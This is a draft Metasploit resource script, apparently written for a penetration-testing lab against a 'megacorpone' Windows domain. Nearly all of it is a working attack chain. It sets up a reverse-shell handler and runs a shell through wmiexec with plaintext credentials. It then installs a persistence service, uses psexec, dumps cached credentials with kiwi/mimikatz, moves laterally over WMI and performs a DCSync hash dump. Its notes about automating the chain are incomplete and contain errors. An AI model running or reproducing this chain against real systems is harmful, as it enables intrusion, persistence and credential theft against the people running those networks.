#!/bin/bash
#resource2.rc

use exploit/multi/handler
set LHOSTS 172.22.117.100
set LPORT 4444
exploit -j

use scanner/smb/impacket/wmiexec
set RHOSTS 172.22.117.20
set SMBDomain megacorpone
set SMBPass Password!
set SMBUser tstark
set COMMAND C:\shell.exe
run

sessions -i 1

#need to add to Pexepect script and make resource3?
Background

use windows/local/persistence_service
set SESSION 1
run

#possible resource4?
getuid

use exploit/windows/smb/psexec
set RHOSTS 172.22.117.20
set SMBUser tstark
set SMBPass Password!
set SMBDomain megacorpone
set LHOST 172.22.117.100
run

#possible resource5?
load kiwi
kiwi_cmd lsadump::cache

use exploit/windows/local/wmi
set RHOSTS 172.22.117.10
set SESSION 3 #maybe? check in testing
set SMBDomain megacorpone
set SMBUser bbanner
set SMBPass Winter2021
set LHOST 172.22.117.100
run -j

#possible resource6?
run
sysinfo
net users
dcsync_ntlm cdanvers
#and so on
